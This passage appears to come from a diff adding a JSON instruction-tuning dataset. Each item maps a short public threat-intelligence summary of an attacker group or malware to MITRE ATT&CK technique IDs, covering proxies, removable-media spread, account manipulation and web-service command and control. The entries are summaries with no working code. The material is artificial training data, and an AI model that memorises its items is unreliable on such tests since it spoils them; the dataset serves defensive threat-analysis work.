the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "GALLIUM used a modified version of HTRAN to redirect connections between networks.", + "output": "- T1090.002: Proxy - External Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lazarus Group has used multiple proxies to obfuscate network traffic from victims.", + "output": "- T1090.002: Proxy - External Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. MuddyWater has used a series of compromised websites that victims connected to randomly to relay information to command and control (C2).", + "output": "- T1090.002: Proxy - External Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "POWERSTATS has connected to C2 servers through proxies.", + "output": "- T1090.002: Proxy - External Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "QakBot has a module that can proxy C2 communications.", + "output": "- T1090.002: Proxy - External Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Silence has used ProxyBot, which allows the attacker to redirect traffic from the current node to the backconnect server via Sock4\\Socks5.", + "output": "- T1090.002: Proxy - External Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Winnti for Windows HTTP/S C2 mode can make use of an external proxy.", + "output": "- T1090.002: Proxy - External Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Tonto Team has routed their traffic through an external server in order to obfuscate their location.", + "output": "- T1090.002: Proxy - External Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A backdoor used by APT29 created a Tor hidden service to forward traffic from the Tor client to local ports 3389 (RDP), 139 (Netbios), and 445 (SMB) enabling full remote access from outside the network and has also used TOR.", + "output": "- T1090.003: Proxy - Multi-hop Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT28 has routed traffic over Tor and VPN servers to obfuscate their activities.", + "output": "- T1090.003: Proxy - Multi-hop Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CostaRicto has used a layer of proxies to manage C2 communications.", + "output": "- T1090.003: Proxy - Multi-hop Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Inception used chains of compromised routers to proxy C2 communications between them and cloud service providers.", + "output": "- T1090.003: Proxy - Multi-hop Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT30 may have used the SHIPSHAPE malware to move onto air-gapped networks. SHIPSHAPE targets removable drives to spread to other systems by modifying the drive to use Autorun to execute or by hiding legitimate document files and copying an executable to the folder with the same name as the legitimate document.", + "output": "- T1091: Replication Through Removable Media" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "DustySky searches for removable media and duplicates itself onto it.", + "output": "- T1091: Replication Through Removable Media" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN7 actors have mailed USB drives to potential victims containing malware that downloads and installs various backdoors, including in some cases for ransomware operations.", + "output": "- T1091: Replication Through Removable Media" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "USBStealer drops commands for a second victim onto a removable media drive inserted into the first victim, and commands are executed when the drive is inserted into the second victim.", + "output": "- T1092: Communication Through Removable Media" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BackdoorDiplomacy has used EarthWorm for network tunneling with a SOCKS5 server and port transfer functionalities.", + "output": "- T1095: Non-Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Derusbi binds to a raw socket on a random source port between 31800 and 31900 for C2.", + "output": "- T1095: Non-Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PLATINUM has used the Intel\u00ae Active Management Technology (AMT) Serial-over-LAN (SOL) channel for command and control.", + "output": "- T1095: Non-Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Pay2Key has sent its public key to the C2 server over TCP.", + "output": "- T1095: Non-Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SDBbot has the ability to communicate with C2 with TCP over port 443.", + "output": "- T1095: Non-Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Some variants of FakeM use SSL to communicate with C2 servers.", + "output": "- T1095: Non-Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lazarus Group malware WhiskeyDelta-Two contains a function that attempts to rename the administrator\u2019s account.", + "output": "- T1098: Account Manipulation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Magic Hound granted compromised email accounts read access to the email boxes of additional targeted accounts. The group then was able to authenticate to the intended victim's OWA (Outlook Web Access) portal and read hundreds of email communications for information on Middle East organizations.", + "output": "- T1098: Account Manipulation\n- T1098.002: Account Manipulation - Additional Email Delegate Permissions" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The Mimikatz credential dumper has been extended to include Skeleton Key domain controller authentication bypass functionality. The \"\"LSADUMP::ChangeNTLM\"\" and \"\"LSADUMP::SetNTLM\"\" modules can also manipulate the password hash of an account without knowing the clear text value.\"", + "output": "- T1098: Account Manipulation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT29 has added credentials to OAuth Applications and Service Principals.", + "output": "- T1098.001: Account Manipulation - Additional Cloud Credentials" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "UNC2452 added credentials to OAuth Applications and Service Principals.", + "output": "- T1098.001: Account Manipulation - Additional Cloud Credentials" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"APT29 added their own devices as allowed IDs for active sync using \"\"Set-CASMailbox\"\", allowing it to obtain copies of victim mailboxes. It also added additional permissions (such as Mail.Read and Mail.ReadWrite) to compromised Application or Service Principals.\"", + "output": "- T1098.002: Account Manipulation - Additional Email Delegate Permissions" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Skidmap has the ability to add the public key of its handlers to the \"\"authorized_keys\"\" file to maintain persistence on an infected host.\"", + "output": "- T1098.004: Account Manipulation - SSH Authorized Keys" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "AADInternals can register a device to Azure AD.", + "output": "- T1098.005: Account Manipulation - Device Registration" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"APT29 registered devices in order to enable mailbox syncing via the \"\"Set-CASMailbox\"\" command.\"", + "output": "- T1098.005: Account Manipulation - Device Registration" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Doki has used the dogechain.info API to generate a C2 address.", + "output": "- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ember Bear has used Discord's content delivery network (CDN) to deliver malware and malicious scripts to a compromised host.", + "output": "- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN6 has used Pastebin and Google Storage to host content for their operations.", + "output": "- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Gamaredon Group has used GitHub repositories for downloaders which will be obtained by the group's .NET executable on the compromised system.", + "output": "- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Astaroth can store C2 information on cloud hosting services such as AWS and CloudFlare and websites like YouTube and Facebook.", + "output": "- T1102.001: Web Service - Dead Drop Resolver" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BLACKCOFFEE uses Microsoft\u2019s TechNet Web portal to obtain a dead drop resolver containing an encoded tag with the IP address of a command and control server.", + "output": "- T1102.001: Web Service - Dead Drop Resolver" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Javali can read C2 information from Google Documents and YouTube.", + "output": "- T1102.001: Web Service - Dead Drop Resolver" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Xbash can obtain a webpage hosted on Pastebin to update its C2 domain list.", + "output": "- T1102.001: Web Service - Dead Drop Resolver" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT12 has used blogs and WordPress for C2 infrastructure.", + "output": "- T1102.002: Web Service - Bidirectional Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BLUELIGHT can use different cloud providers for its C2.", + "output": "- T1102.002: Web Service - Bidirectional Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BoxCaon has used DropBox for C2 communications.", + "output": "- T1102.002: Web Service - Bidirectional Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Comnie uses blogs and third-party sites (GitHub, tumbler, and BlogSpot) to avoid DNS-based blocking of their communication to the command and control server.", + "output": "- T1102.002: Web Service - Bidirectional Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Empire can use Dropbox and GitHub for C2.", + "output": "- T1102.002: Web Service - Bidirectional Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN7 used legitimate services like Google Docs, Google Scripts, and Pastebin for C2.", + "output": "- T1102.002: Web Service - Bidirectional Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Grandoreiro can utilize web services including Google sites to send and receive C2 data.", + "output": "- T1102.002: Web Service - Bidirectional Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HEXANE has used cloud services, including OneDrive, for C2.", + "output": "- T1102.002: Web Service - Bidirectional Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "KARAE can use public cloud-based storage providers for command and control.", + "output": "- T1102.002: Web Service - Bidirectional Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LOWBALL uses the Dropbox cloud storage service for command and control.", + "output": "- T1102.002: Web Service - Bidirectional Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MuddyWater has used web services including OneHub to distribute remote access tools.", + "output": "- T1102.002: Web Service - Bidirectional Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SLOWDRIFT uses cloud based services for C2.", + "output": "- T1102.002: Web Service - Bidirectional Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sandworm Team has used the Telegram Bot API from 